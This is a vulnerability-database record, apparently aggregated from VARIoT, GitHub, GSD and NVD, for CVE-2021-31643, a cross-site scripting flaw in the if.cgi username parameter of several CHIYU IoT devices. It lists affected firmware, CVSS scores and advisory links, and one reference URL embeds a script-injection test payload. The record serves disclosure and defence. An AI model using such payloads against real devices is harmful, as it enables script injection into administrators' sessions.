"id": "JVNDB-2021-007491",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "PACKETSTORM",
"id": "162887"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
]
},
"id": "VAR-202106-1313",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.8
},
"last_update_date": "2023-12-18T12:26:51.267000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Firmware\u00a0update",
"trust": 0.8,
"url": "https://www.chiyu-tech.com/msg/message-firmware-update-87.html"
},
{
"title": "BF-630W Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=153502"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/162887/chiyu-iot-cross-site-scripting.html"
},
{
"trust": 1.7,
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"trust": 1.6,
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"trust": 1.6,
"url": "https://www.chiyu-tech.com/msg/message-firmware-update-87.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31643"
},
{
"trust": 0.1,
"url": "http://192.168.187.12/ap_tcps.htm"
},
{
"trust": 0.1,
"url": "http://192.168.187.12/manage.htm"
},
{
"trust": 0.1,
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31250"
},
{
"trust": 0.1,
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks"
},
{
"trust": 0.1,
"url": "http://ip/\u003cscript\u003ealert(123)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31641"
},
{
"trust": 0.1,
"url": "https://www.chiyu-tech.com/category-hardware.html"
},
{
"trust": 0.1,
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250"
},
{
"trust": 0.1,
"url": "https://www.chiyu-tech.com/msg/msg88.html"
},
{
"trust": 0.1,
"url": "http://192.168.187.12/wan_dc.htm"
},
{
"trust": 0.1,
"url": "http://192.168.187.143/wan_pe.htm"
},
{
"trust": 0.1,
"url": "http://127.0.0.1/emprcd.htm"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "PACKETSTORM",
"id": "162887"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"db": "PACKETSTORM",
"id": "162887"
},
{
"db": "NVD",
"id": "CVE-2021-31643"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"date": "2021-06-01T15:08:26",
"db": "PACKETSTORM",
"id": "162887"
},
{
"date": "2021-06-01T15:15:07.747000",
"db": "NVD",
"id": "CVE-2021-31643"
},
{
"date": "2021-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-02-14T09:15:00",
"db": "JVNDB",
"id": "JVNDB-2021-007491"
},
{
"date": "2021-06-08T20:33:15.690000",
"db": "NVD",
"id": "CVE-2021-31643"
},
{
"date": "2021-08-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural \u00a0CHIYU\u00a0Technology\u00a0 Made \u00a0IoT\u00a0 Cross-site scripting vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-007491"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "162887"
},
{
"db": "CNNVD",
"id": "CNNVD-202106-019"
}
],
"trust": 0.7
}
}
GHSA-HXRR-8F87-QRGP
Vulnerability from github – Published: 2022-05-24 19:03 – Updated: 2022-05-24 19:03
VLAI?
Details
An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.
{
"affected": [],
"aliases": [
"CVE-2021-31643"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-06-01T15:15:00Z",
"severity": "MODERATE"
},
"details": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.",
"id": "GHSA-hxrr-8f87-qrgp",
"modified": "2022-05-24T19:03:41Z",
"published": "2022-05-24T19:03:41Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31643"
},
{
"type": "WEB",
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"type": "WEB",
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks"
},
{
"type": "WEB",
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
},
{
"type": "WEB",
"url": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html"
}
],
"schema_version": "1.4.0",
"severity": []
}
GSD-2021-31643
Vulnerability from gsd - Updated: 2023-12-13 01:23Details
An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2021-31643",
"description": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.",
"id": "GSD-2021-31643",
"references": [
"https://packetstormsecurity.com/files/cve/CVE-2021-31643"
]
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2021-31643"
],
"details": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.",
"id": "GSD-2021-31643",
"modified": "2023-12-13T01:23:13.379114Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-31643",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/",
"refsource": "MISC",
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"name": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html",
"refsource": "MISC",
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
},
{
"name": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643",
"refsource": "MISC",
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"name": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html"
}
]
}
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:bf-631_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:bf-631:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:bf-630_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:bf-630:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_s2_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_s2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_d1_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_d1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_d2_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_d2:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_d4_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_d4:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_s3v3_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_s3v3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_d2_n300_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_d2_n300:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:semac_s1_osdp_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:semac_s1_osdp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:webpass_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:webpass:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:chiyu-tech:biosense_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:chiyu-tech:biosense:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-31643"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html",
"refsource": "MISC",
"tags": [
"Vendor Advisory"
],
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
},
{
"name": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"name": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"name": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html",
"refsource": "MISC",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html"
}
]
}
},
"impact": {
"baseMetricV2": {
"acInsufInfo": false,
"cvssV2": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"userInteractionRequired": true
},
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7
}
},
"lastModifiedDate": "2021-06-08T20:33Z",
"publishedDate": "2021-06-01T15:15Z"
}
}
}
FKIE_CVE-2021-31643
Vulnerability from fkie_nvd - Published: 2021-06-01 15:15 - Updated: 2024-11-21 06:06
Severity ?
Summary
An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:bf-631_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D6C27421-EA1F-46FB-AFA7-7A1E75AC471C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:bf-631:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F5451C0F-FA08-467D-86AC-034A2AAA8468",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:bf-630_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B3CD54F1-95A0-4014-8466-E29B5F819B7E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:bf-630:-:*:*:*:*:*:*:*",
"matchCriteriaId": "49BA7B09-A81C-4B8C-A50C-9F58B53903A2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:semac_s2_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E605EBAB-D5F9-43A8-8096-DA62A4295A92",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:semac_s2:-:*:*:*:*:*:*:*",
"matchCriteriaId": "BDAC8B2A-8AB4-4EAB-84D5-526F89C8D9B6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:semac_d1_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "A4B14981-FCEA-45FC-896F-7677BEB7A8FB",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:semac_d1:-:*:*:*:*:*:*:*",
"matchCriteriaId": "59C613EE-4884-4CD6-B4BA-AF41FD26DB35",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:semac_d2_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "10BBB47A-E6EF-4EE5-A74C-F7766004880B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:semac_d2:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7123F403-1044-4ECC-A6F8-AB8E0173432B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:semac_d4_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D6A0946C-6A4F-4A9E-9D7C-702A74236C89",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:semac_d4:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0F4E3539-D33A-48E1-8B09-4D010BEAC9C1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:semac_s3v3_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DF097E2D-8F46-4EE0-9C0E-449EDC5FE373",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:semac_s3v3:-:*:*:*:*:*:*:*",
"matchCriteriaId": "231A210D-7A72-4E54-BF7D-2594F2735D68",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:semac_d2_n300_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "52481D14-6CDD-4D28-ACEB-83EC3FAC7F4D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:semac_d2_n300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "24D35D62-9633-410F-9D2D-FD61CD5A820B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:semac_s1_osdp_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B982FDE3-0F08-46F8-8A50-BB5650AA5076",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:semac_s1_osdp:-:*:*:*:*:*:*:*",
"matchCriteriaId": "965D6B8E-A7E7-40B3-A4C3-4942E61491A5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:webpass_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5D66FE82-1351-4532-811F-ED7C98B0FFA3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:webpass:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3EE455A8-8F52-4F08-9ED6-D4A081CFC185",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:chiyu-tech:biosense_firmware:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9CDE9F3B-3952-4715-B8B0-F1A971B06254",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:chiyu-tech:biosense:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7C3D40CA-A163-4B11-A070-04FB492194E1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An XSS vulnerability exists in several IoT devices from CHIYU Technology, including SEMAC, Biosense, BF-630, BF-631, and Webpass due to a lack of sanitization on the component if.cgi - username parameter."
},
{
"lang": "es",
"value": "Se presenta una vulnerabilidad de tipo XSS en varios dispositivos IoT de CHIYU Technology, incluyendo SEMAC, Biosense, BF-630, BF-631 y Webpass, debido a una falta de sanitizaci\u00f3n en el component if.cgi - par\u00e1metro username"
}
],
"id": "CVE-2021-31643",
"lastModified": "2024-11-21T06:06:04.037",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-06-01T15:15:07.747",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/162887/CHIYU-IoT-Cross-Site-Scripting.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.chiyu-tech.com/msg/message-Firmware-update-87.html"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
